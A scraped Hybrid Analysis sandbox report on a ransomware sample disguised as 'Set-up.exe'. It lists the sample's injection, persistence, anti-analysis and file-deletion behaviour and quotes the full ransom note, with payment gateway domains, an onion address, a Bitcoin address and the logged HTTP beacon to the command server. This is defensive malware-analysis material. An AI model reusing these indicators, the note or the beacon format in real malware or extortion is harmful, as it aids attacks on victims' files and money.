Https://www.hybrid-analysis.com là gì

Analysis Overview Request Report Deletion

Submission name:

Set-up.exe

Other submission names

• Set-up install.exe
• Set-up.original.exe
• Set.up.exe
• Setup.exe
• file

Mime:

application/x-dosexec

Operating System:

Windows

Last Anti-Virus Scan:

08/05/2022 00:18:02 (UTC)

Last Sandbox Report:

08/03/2021 12:58:02 (UTC)

malicious

Threat Score: 65/100

Anti-Virus Results Refresh

CrowdStrike Falcon

Downloading data

Static Analysis and ML

MetaDefender

Submitting file

Multi Scan Analysis

VirusTotal

Downloading data

Multi Scan Analysis

Related Hashes

Falcon Sandbox Reports

Community

Incident Response

Risk Assessment

Network Behavior Contacts 2 domains and 2 hosts. View all details

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

• Exploit/Shellcode
  • Writes shellcode to a remote process

    details Wrote 106 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 292 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 66 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 48 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 185 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 293 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 234 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 519 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 98 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540)
    Wrote 12 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (UID: 00101562-00001540) sourceHybrid Analysis Technologyrelevance8/10

• General
  • Sample was identified as malicious by at least one Antivirus engine

    details 3/57 Antivirus vendors marked sample as malicious (5% detection rate) sourceExternal Systemrelevance 10/10

• Installation/Persistance
  • Allocates virtual memory in foreign process

    details "" allocated 00000088 bytes of memory in "risjrov.exe" (Protection: "read/write")
    "" allocated 00000088 bytes of memory in "cmd.exe" (Protection: "read/write") sourceAPI Callrelevance7/10

  • Writes a PE file header to disc

    details "" wrote 65536 bytes starting with PE header signature to file "%LOCALAPPDATA%\risjrov.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ... sourceAPI Callrelevance1/10

  • Writes data to a remote process

    details "" wrote 32 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
    "" wrote 52 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
    "" wrote 4 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
    "" wrote 1024 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
    "" wrote 234496 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
    "" wrote 30208 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
    "" wrote 27648 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
    "" wrote 512 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" (PID: 00001540)
    "" wrote 32 bytes to a foreign process "risjrov.exe" (PID: 00001380) sourceAPI Callrelevance6/10

• Network Related
  • Found more than one unique User-Agent

    details Found the following User-Agents: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
    Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) sourceNetwork Trafficrelevance5/10

• Ransomware/Banking
  • Detected indicator that file is ransomware

    details "All your documents, photos, databases and other important files have been encrypted
    with strongest encryption RSA-2048 key, generated for this computer.

    Private decryption key is stored on a secret Internet server and nobody can
    decrypt your files until y" (Source: 00113343-00002640-7731F918-128658, Indicator: "decrypt your files")
    "All your documents, photos, databases and other important files have been encrypted
    with strongest encryption RSA-2048 key, generated for this computer.

    Private decryption key is stored on a secret Internet server and nobody can
    decrypt your files un" (Source: 25712-59-004051C0, Indicator: "decrypt your files")
    "All your important files are encrypted!" (Source: 25712-918-00406200, Indicator: "files are encrypted")
    "The only copy of the private key, which will allow you to decrypt your files,is located on a secret TOR
    server in the Internet; the server will eliminate the key after a time period specified in this window." (Source: 25712-918-00406200, Indicator: "decrypt your files")
    "iles until you pay and obtain the private key.

    If you see the main encryptor red window, examine it and follow the instructions.
    Otherwise, it seems that you or your antivirus deleted the encryptor program.
    Now you have the last chance to decrypt your files.
    Open in your browser one of the links:
    http://iq3ahijcfeont3xx.fenaow48fn42.com
    http://iq3ahijcfeont3xx.sm4i8smr3f43.com
    https://iq3ahijcfeont3xx.tor2web.blutmagie.de
    They are public gates to the secret server.
    Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
    %s
    Follow the instructions on the server.

    If you have problems with gates, use direct connection:
    1. Download Tor Browser from http://torproject.org
    2. In the Tor Browser open the http://iq3ahijcfeont3xx.onion/
    Note that this server is available via Tor Browser only.
    Retry in 1 hour if site is not reachable.
    Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
    %s
    Follow the instructi" (Source: 00101562-00001540.00000000.104296.400000.00000040.mdmp, Indicator: "decrypt your files")
    "ur files until you pay and obtain the private key.

    If you see the main encryptor red window, examine it and follow the instructions.

    Otherwise, it seems that you or your antivirus deleted the encryptor program.

    Now you have the last chance to decrypt your files.

    Open in your browser one of the links:

    http://iq3ahijcfeont3xx.fenaow48fn42.com

    http://iq3ahijcfeont3xx.sm4i8smr3f43.com

    https://iq3ahijcfeont3xx.tor2web.blutmagie.de

    They are public gates to the secret server.

    Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.

    %s

    Follow the instructions on the server.

    If you have problems with gates, use direct connection:

    1. Download Tor Browser from http://torproject.org

    2. In the Tor Browser open the http://iq3ahijcfeont3xx.onion/

    Note that this server is available via Tor Browser only.

    Retry in 1 hour if site is not reachable.

    Copy and paste the following Bitcoin address in the input form on server. Avoid missprints." (Source: 00001540.000001C8.101453.0043B000.wprm, Indicator: "decrypt your files")
    "which will allow you to decrypt your files,is located on a secret TOR" (Source: 00001540.000001C8.101453.0043B000.wprm, Indicator: "decrypt your files")
    "All your documents, photos, databases and other important files have been encrypted
    with strongest encryption RSA-2048 key, generated for this computer.

    Private decryption key is stored on a secret Internet server and nobody can
    decrypt your files until you pay and obtain the private key.

    If you see the main encryptor red window, examine it and follow the instructions.
    Otherwise, it seems that you or your antivirus deleted the encryptor program.
    Now you have the last chance to decrypt your files.
    Open in your browser one of the links:
    http://iq3ahijcfeont3xx.fenaow48fn42.com
    http://iq3ahijcfeont3xx.sm4i8smr3f43.com
    https://iq3ahijcfeont3xx.tor2web.blutmagie.de
    They are public gates to the secret server.
    Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
    16gpagzWUuxphi3ZwyjoXdqA5HUZR68mwa
    Follow the instructions on the server.

    If you have problems with gates, use direct connection:
    1. Download Tor Browser from http://torproject.org
    2. In the" (Source: 00113343-00002640.00000001.149687.400000.00000040.mdmp, Indicator: "decrypt your files")
    "All your documents, photos, databases and other important files have been encrypted" (Source: HELP_RESTORE_FILES_stosh.TXT.128656, Indicator: "files have been encrypted")
    "Private decryption key is stored on a secret Internet server and nobody can" (Source: HELP_RESTORE_FILES_stosh.TXT.128656, Indicator: "private decryption key")

    sourceStringrelevance9/10

  • The input sample dropped a known ransomware file

    details Found dropped filename "RECOVERY_FILE.TXT"
    which has been seen in the context of ransomware source Extracted Filerelevance5/10

• Spyware/Information Retrieval
  • Accesses potentially sensitive information from local browsers

    details "risjrov.exe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" (Type: "FileHandle", Context: "NtSetInformationFile")
    "risjrov.exe" had access to "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies\index.dat" (Type: "FileHandle", Context: "NtSetInformationFile")
    "risjrov.exe" had access to "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat" (Type: "FileHandle", Context: "NtSetInformationFile") sourceTouched Handlerelevance5/10

• System Security
  • Modifies proxy settings

    details "" (Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
    "" (Access type: "DELETEVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
    "risjrov.exe" (Access type: "SETVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000")
    "risjrov.exe" (Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYSERVER")
    "risjrov.exe" (Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYOVERRIDE")
    "risjrov.exe" (Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
    "risjrov.exe" (Access type: "DELETEVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS") sourceRegistry Accessrelevance8/10

  • Queries/modifies the display settings of system associated file extensions

    details "" (Access type: "QUERYVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE", Key: "ALWAYSSHOWEXT")
    "" (Access type: "QUERYVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE", Key: "NEVERSHOWEXT") sourceRegistry Accessrelevance7/10

• Unusual Characteristics
  • Contains native function calls
  • Spawns a lot of processes

    details Spawned process "" (Show Process)
    Spawned process "" (Show Process)
    Spawned process "risjrov.exe" (Show Process)
    Spawned process "risjrov.exe" (Show Process)
    Spawned process "cmd.exe" with commandline "/c del C:\300DE5~1 >> NUL" (Show Process) sourceMonitored Targetrelevance8/10

• Anti-Detection/Stealthyness
  • Sets the process error mode to suppress error box

    details "" set its error mode to SEM_NOOPENFILEERRORBOX
    "risjrov.exe" set its error mode to SEM_NOOPENFILEERRORBOX sourceAPI Callrelevance8/10

• Anti-Reverse Engineering
  • Contains ability to register a top-level exception handler (often used as anti-debugging trick)

    details from PID 00001220
    from PID 00001220
    from PID 00001220
    from 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b (PID: 1220) (Show Stream)
    from PID 00001220
    from PID 00001220
    from PID 00001540
    from PID 00001540
    from PID 00001540
    from PID 00001540 sourceHybrid Analysis Technologyrelevance1/10

• Environment Awareness
  • Contains ability to query the machine version
  • Possibly tries to detect the presence of a debugger

    details from PID 00001540
    from PID 00001540
    from PID 00002640
    from PID 00002640 sourceHybrid Analysis Technologyrelevance1/10

  • Possibly tries to implement anti-virtualization techniques

    details "AdSv - vmsrvc.sys - Virtual Machines Additions Service" (Indicator: "vmsrvc") sourceStringrelevance4/10

  • Reads the cryptographic machine GUID

    details "risjrov.exe" (Path: "\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\CRYPTOGRAPHY", Key: "MACHINEGUID") sourceRegistry Accessrelevance10/10

• General
  • Reads configuration files

    details "" read file "C:\Windows\win.ini"
    "" read file "%USERPROFILE%\Desktop\desktop.ini"
    "risjrov.exe" read file "C:\Windows\win.ini"
    "risjrov.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini" sourceAPI Callrelevance4/10

• Installation/Persistance
  • Drops executable files

    details "risjrov.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows" sourceExtracted Filerelevance10/10

  • Modifies auto-execute functionality by setting a value in the registry

    details "risjrov.exe" (Access type: "CREATE", Path: "\REGISTRY\MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
    "risjrov.exe" (Access type: "CREATE", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
    "risjrov.exe" (Access type: "SETVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "MSCONFIG", Value: "%LOCALAPPDATA%\risjrov.exe")
    "risjrov.exe" (Access type: "CREATE", Path: "\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
    "risjrov.exe" (Access type: "SETVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "MSCONFIG", Value: "C:\Users\%USERNAME%\AppData\Local\risjrov.exe") source Registry Accessrelevance8/10

• Network Related
  • Found potential IP address in binary/memory

    details "85.25.146.22" sourceStringrelevance3/10

  • Found potential URL in binary/memory

    details "http://ipinfo.io/ip"
    "http://iq3ahijcfeont3xx.fenaow48fn42.com/?enc=%s"
    "http://iq3ahijcfeont3xx.sm4i8smr3f43.com"
    "http://www.torproject.org/projects/torbrowser.html.en"
    "https://iq3ahijcfeont3xx.tor2web.blutmagie.de" sourceStringrelevance2/10

• Spyware/Information Retrieval
  • Contains ability to enumerate processes/modules/threads

    details at 00113343-00002640-773301AA-121019
    at 00113343-00002640-773301AA-121035
    from PID 00002640
    from risjrov.exe (PID: 2640) (Show Stream) sourceHybrid Analysis Technologyrelevance5/10

  • Contains ability to open the clipboard
• System Destruction
  • Marks file for deletion

    details "%LOCALAPPDATA%\risjrov.exe" marked "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ip[1].txt" for deletion
    "C:\Users\%USERNAME%\AppData\Local\risjrov.exe" marked "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ping[1].htm" for deletion sourceAPI Callrelevance10/10

  • Opens file with deletion access rights

    details "risjrov.exe" opened "C:\MSOCache\All Users\{90120000-006E-0407-0000-0000000FF1CE}-C\Microsoft.VC80.CRT.manifest" with delete access
    "risjrov.exe" opened "%PROGRAMFILES%\Application Verifier (x64)\REDIST.TXT" with delete access
    "risjrov.exe" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ip[1].txt" with delete access
    "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\dml.doc" with delete access
    "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\kernel_debugging_tutorial.doc" with delete access
    "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\license.txt" with delete access
    "risjrov.exe" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ping[1].htm" with delete access
    "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\redist.txt" with delete access
    "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\relnotes.txt" with delete access
    "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows (x64)\sdk\samples\extcpp\readme.txt" with delete access sourceAPI Callrelevance7/10

• System Security
  • Adjusts debug privileges

    details "" adjusted SE_DEBUG_PRIVILEGE
    "risjrov.exe" adjusted SE_DEBUG_PRIVILEGE sourceAPI Callrelevance3/10

• Unusual Characteristics
  • Imports suspicious APIs

    details GetThreadContext
    CreateProcessW
    LoadLibraryW
    GetModuleFileNameW
    GetProcAddress
    VirtualAllocEx
    WriteProcessMemory
    GetModuleHandleW
    GetCommandLineA
    GetStartupInfoW
    TerminateProcess
    UnhandledExceptionFilter
    IsDebuggerPresent
    WriteFile
    GetModuleFileNameA
    GetTickCount
    Sleep sourceStatic Parserrelevance1/10

  • Reads information about supported languages

    details "risjrov.exe" (Path: "\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE", Key: "00000407")
    "cmd.exe" (Path: "\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE", Key: "00000407") sourceRegistry Accessrelevance3/10

• Hiding 12 Suspicious Indicators
  • All indicators are available only in the private webservice or standalone version

• Environment Awareness
  • Contains ability to query machine time

    details from PID 00001220
    from 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b (PID: 1220) (Show Stream)
    from PID 00001540
    from PID 00001540
    from PID 00001540
    from PID 00001540
    from PID 00001540
    from PID 00001540
    from PID 00001380
    from risjrov.exe (PID: 1380) (Show Stream) sourceHybrid Analysis Technologyrelevance1/10

• General
  • Contacts domains

    details "ipinfo.io"
    "24u4jf7s4regu6hn.fenaow48fn42.com" sourceNetwork Trafficrelevance1/10

  • Contacts server

    details "54.93.61.143"
    "104.27.142.176" sourceNetwork Trafficrelevance1/10

  • Creates mutants

    details "Local\ZonesCounterMutex"
    "Local\ZoneAttributeCacheCounterMutex"
    "Local\ZonesCacheCounterMutex"
    "Local\ZonesLockedCacheCounterMutex"
    "Local\_!MSFTHISTORY!_"
    "Local\c:!users!pspubws!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
    "Local\c:!users!pspubws!appdata!roaming!microsoft!windows!cookies!"
    "Local\c:!users!pspubws!appdata!local!microsoft!windows!history!history.ie5!"
    "Local\WininetStartupMutex"
    "Local\WininetConnectionMutex" sourceCreated Mutantrelevance3/10

  • GETs files from a webserver

    details "GET /ip HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
    Host: ipinfo.io"
    "GET /ping.php?U3ViamVjdD1QaW5nJmtleT02MzY3QkVENTYwMDBBNjBCMkYyQzhBNzJGRkNDNEU0ODA5NTY2MDY4QTczQTc0RDAwRjk4QzcxNThENzVBOEM1JmFkZHI9MTZncGFneldVdXhwaGkzWnd5am9YZHFBNUhVWlI2OG13YSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuNC4wYSZPUz03NjAxJklEPTg4JnN1YmlkPTAmZ2F0ZT1HMCZpc19hZG1pbj0xJmlzXzY0PTEmaXA9ODUuMjUuMTQ2LjIy HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: 24u4jf7s4regu6hn.fenaow48fn42.com
    Connection: Keep-Alive" sourceNetwork Trafficrelevance5/10

  • Loads modules at runtime

    details "" loaded module "%WINDIR%\SYSTEM32\APPHELP.DLL" at base 747F0000
    "" loaded module "PROPSYS.DLL" at base 74630000
    "" loaded module "OLE32.DLL" at base 75250000
    "" loaded module "COMCTL32.DLL" at base 74B40000
    "" loaded module "OLEAUT32.DLL" at base 76CA0000
    "" loaded module "ADVAPI32.DLL" at base 75A10000
    "" loaded module "SHELL32.DLL" at base 75F50000
    "" loaded module "C:\WINDOWS\SYSTEM32\PROPSYS.DLL" at base 74630000
    "" loaded module "NTMARTA.DLL" at base 745C0000 sourceAPI Callrelevance1/10

  • Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)

    details ""
    ""
    ""
    ""
    ""
    ""
    ""
    ""
    ""
    "" sourceAPI Callrelevance1/10

  • Runs shell commands

    details "/c del C:\300DE5~1 >> NUL" on 2015-05-14.17:06:09 sourceMonitored Targetrelevance5/10

• Installation/Persistance
  • Contains ability to lookup the windows account name

    details at 00101562-00001540-773301AA-115708
    at 00113343-00002640-773301AA-133152 sourceHybrid Analysis Technologyrelevance5/10

  • Dropped files

    details "risjrov.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
    "storage.bin" has type "data"
    "RECOVERY_FILE.TXT" has type "ASCII text, with CRLF line terminators"
    "log.html" has type "HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators"
    "HELP_RESTORE_FILES_stosh.TXT" has type "ASCII text, with CRLF line terminators"
    "Microsoft.VC80.CRT.manifest" has type "XML document text"
    "REDIST.TXT" has type "data"
    "ip[1].txt" has type "ASCII text"
    "dml.doc" has type "Composite Document File V2 Document, Little Endian, O%WINDIR%\ Version 6.0, Code page: 1252, Title: Debugger Markup, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Sep 21 08:00:00 2007, Create Time/Date: Sat Sep 22 00:03:00 2007, Last Saved Time/Date: Sat Sep 22 00:03:00 2007, Number of Pages: 11, Number of Words: 3195, Number of Characters: 16588, Security: 0"
    "kernel_debugging_tutorial.doc" has type "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Kernel Debugging with WinDbg Tutorial, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:25:00 2007, Last Saved Time/Date: Tue Sep 25 21:25:00 2007, Number of Pages: 64, Number of Words: 13581, Number of Characters: 75240, Security: 0" sourceExtracted Filerelevance3/10

File Details

All Details:

hfxtnsu.exe

Filenamehfxtnsu.exeSize375KiB (383488 bytes)Typepeexe executableDescriptionPE32 executable (GUI) Intel 80386, for MS WindowsArchitecture WINDOWSSHA256300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b

Visualization

Classification (TrID)

• 67.3% (.EXE) Win32 Executable MS Visual C++ (generic)
• 14.2% (.DLL) Win32 Dynamic Link Library (generic)
• 9.7% (.EXE) Win32 Executable (generic)
• 4.3% (.EXE) Generic Win/DOS Executable
• 4.3% (.EXE) DOS Executable Generic

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 5 processes in total.

Network Analysis

DNS Requests

HTTP Traffic

Extracted Files

Displaying 32 extracted file(s). The remaining 251 file(s) are available in the full version and XML/JSON reports.

• • HELP_RESTORE_FILES_stosh.TXT

  • Microsoft.VC80.CRT.manifest

  • REDIST.TXT

  • dml.doc

    Size111KiB (113900 bytes)TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Debugger Markup, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Sep 21 08:00:00 2007, Create Time/Date: Sat Sep 22 00:03:00 2007, Last Saved Time/Date: Sat Sep 22 00:03:00 2007, Number of Pages: 11, Number of Words: 3195, Number of Characters: 16588, Security: 0MD5 9759d0d191d542f59b657e5d308094bb SHA1 04b43ba5b5add678ac7fbb1ca687b8c39e4bc666 SHA256 d31f8885d924b3a5928b260b05f60f1afa4993e9f400950c7f3df9dfd2164f70

  • kernel_debugging_tutorial.doc

    Size2.3MiB (2392300 bytes)TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Kernel Debugging with WinDbg Tutorial, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:25:00 2007, Last Saved Time/Date: Tue Sep 25 21:25:00 2007, Number of Pages: 64, Number of Words: 13581, Number of Characters: 75240, Security: 0MD5 83e4a132a62e1a2fe3bbcc088681979d SHA1 a01140b6c34571c48db54e3bb0887acabbb60760 SHA256 a91fd55fc64f0678ca6ecfbd409e1172cbc3536722335d52516ca554673942cb

  • license.txt

  • relnotes.txt

  • readme.txt

  • srcsrv.doc

    Size217KiB (222444 bytes)TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Source Server, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Sat Jun 17 20:09:00 2006, Create Time/Date: Tue Sep 25 21:45:00 2007, Last Saved Time/Date: Thu Mar 20 22:48:00 2008, Number of Pages: 19, Number of Words: 6614, Number of Characters: 37706, Security: 0MD5 a7600489849fbeacc95d06ac70756d5c SHA1 5cd7934d2a3b1c6628d2c407dd2c2f674b2bbe1d SHA256 2bb9bec411d1e87d1d150e9b01bc919ac5d7bd415ebbd9b49652930bd1051651

  • symhttp.doc

    Size542KiB (555244 bytes)TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: HTTP Symbol Stores and the Symbol Server Proxy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:49:00 2007, Last Saved Time/Date: Tue Sep 25 21:49:00 2007, Number of Pages: 19, Number of Words: 4139, Number of Characters: 21611, Security: 0MD5 246be13e750d0023f720e9b449226f44 SHA1 719632fe06de246a473d0e2ce19af3da7aca9aea SHA256 06c9ad0a058a1f52d21b8d69b4cb7d4a72618d6bb5e08d54e0522c18317ee136

  • themes.doc

    Size1.1MiB (1102060 bytes)TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: WinDbg Themes, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:04:00 2007, Last Saved Time/Date: Tue Sep 25 21:04:00 2007, Number of Pages: 6, Number of Words: 491, Number of Characters: 2780, Security: 0MD5 4344b6b0cad35480dea522d4329a00af SHA1 2a828e437afba57f61d4a9abcc8d5f7a91079983 SHA256 f78f42c7c94f836631168213696575b9cff3902df7dc1acf4bfa69d8a6055e04

  • pooltag.txt

  • Mso Example Intl Setup File A.txt

  • Mso Example Intl Setup File B.txt

  • Mso Example Setup File A.txt

  • troubleshootingtest.psd1

  • sign.js

  • fxref_Microsoft.JScript.Vsa.hxs

    Size301KiB (307832 bytes)

  • fxref_Microsoft.SqlServer.Server.hxs

    Size1.2MiB (1213326 bytes)

  • fxref_System.Data.Linq.Mapping.hxs

    Size985KiB (1008588 bytes)

  • sample.docx

  • omniprov.doc

    Size306KiB (313580 bytes)

  • DbgSpec.doc

  • testEE.cer

  • contoso.cer

  • contosoroot.cer

  • TestCertificate.cer

  • MigratingToAeroWizards.doc

    Size832KiB (852204 bytes)

  • IFileIsInUse_sample.docx

    Size385KiB (393914 bytes)

  • Using the System Folder View.doc

    Size519KiB (531692 bytes)

  • risjrov.exe

  • storage.bin

Notifications

• Not all strings are visible in the report, because the maximum number of strings was reached (5000)
• Parsed more than maximum number of dropped files (20), report might not contain information about some dropped files
• Some API calls are hidden from the report due to oversize